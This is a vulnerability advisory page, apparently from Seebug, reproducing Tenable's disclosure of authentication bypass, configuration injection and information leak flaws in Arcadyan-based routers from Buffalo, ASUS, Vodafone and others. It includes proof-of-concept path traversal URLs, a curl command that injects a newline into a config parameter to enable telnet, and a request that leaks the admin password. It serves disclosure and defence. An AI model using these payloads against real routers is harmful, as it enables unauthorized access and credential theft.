Lucene search

K
seebugKnownsecSSV:99329
HistoryAug 11, 2021 - 12:00 a.m.

Buffalo和Arcadyan多款路由器认证绕过RCE等多个漏洞

2021-08-1100:00:00
Knownsec
www.seebug.org
619

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.

During the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware.

Please note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.

CVE-2021-20090 : Path Traversal
CVSSv3 Base Score: 8.1
CVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
A path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.
This vulnerability has also been confirmed to affect the following devices
note: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.
Please contact the devices’ respective vendors for more information.

Vendor Device Found on version
ADB ADSL wireless IAD router 1.26S-R-3P
Arcadyan ARV7519 00.96.00.96.617ES
Arcadyan VRV9517 6.00.17 build04
Arcadyan VGV7519 3.01.116
Arcadyan VRV9518 1.01.00 build44
ASMAX BBR-4MG / SMC7908 ADSL 0.08
ASUS DSL-AC88U (Arc VRV9517) 1.10.05 build502
ASUS DSL-AC87VG (Arc VRV9510) 1.05.18 build305
ASUS DSL-AC3100 1.10.05 build503
ASUS DSL-AC68VG 5.00.08 build272
Beeline Smart Box Flash 1.00.13_beta4
British Telecom WE410443-SA 1.02.12 build02
Buffalo WSR-2533DHPL2 1.02
Buffalo WSR-2533DHP3 1.24
Buffalo BBR-4HG
Buffalo BBR-4MG 2.08 Release 0002
Buffalo WSR-3200AX4S 1.1
Buffalo WSR-1166DHP2 1.15
Buffalo WXR-5700AX7S 1.11
Deutsche Telekom Speedport Smart 3 010137.4.8.001.0
HughesNet HT2000W 0.10.10
KPN ExperiaBox V10A (Arcadyan VRV9517) 5.00.48 build453
KPN VGV7519 3.01.116
O2 HomeBox 6441 1.01.36
Orange LiveBox Fibra (PRV3399) 00.96.00.96.617ES
Orange LiveBox Fibra (PRV3399) 00.96.00.96.617ES
Skinny Smart Modem (Arcadyan VRV9517) 6.00.16 build01
SparkNZ Smart Modem (Arcadyan VRV9517) 6.00.17 build04
Telecom (Argentina) Arcadyan VRV9518VAC23-A-OS-AM 1.01.00 build44
TelMex PRV33AC 1.31.005.0012
TelMex VRV7006
Telstra Smart Modem Gen 2 (LH1000) 0.13.01r
Telus WiFi Hub (PRV65B444A-S-TS) v3.00.20
Telus NH20A 1.00.10debug build06
Verizon Fios G3100 2.0.0.6
Vodafone EasyBox 904 4.16
Vodafone EasyBox 903 30.05.714
Vodafone EasyBox 802 20.02.226

Proof of Concept:

The vulnerability exists due to a list of folders which fall under a “bypass list” for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:

For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:

http://<ip>/images/…%2findex.htm
http://<ip>/js/…%2findex.htm
http://<ip>/css/…%2findex.htm
To have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the …%2f traversal (which can be match/replaced as well).

CVE-2021-20091 : Configuration File Injection
CVSSv3 Base Score: 7.5
CVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
Proof of Concept:
The injection occurs in parameters which pass from apply_abstract.cgi to the device’s global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/…%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd.

curl --include -X POST http://&lt;ip&gt;/apply_abstract.cgi -H "Referer: http://&lt;ip&gt;/ping.html" --data "action=start_ping&httoken=&lt;valid httoken&gt;&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=&lt;ip&gt;%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"

The %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.
CVE-2021-20092 : Improper Access Control
CVSSv3 Base Score: 5.9
CVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
Proof of Concept:

To get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).
Open DevTools
Run getToken() in the Console.
Copy the token, and use it in the following command from a terminal:

$ curl --include "http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667" -H "Referer: http://192.168.11.1/loginerror.html"

HTTP/1.1 200 OK
Date: Mon, 13 Jan 2020 15:24:03 GMT
Server: Arcadyan httpd 1.0
Content-type: application/x-javascript
X-FRAME-OPTIONS: SAMEORIGIN
Connection: close

/*DEMO*/
var login_password = “&lt;admin password&gt;“;

addCfg("lan_ipaddr", 0, "192.168.11.1");

Solution
Customers should seek update and mitigation information from their respective vendors.

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P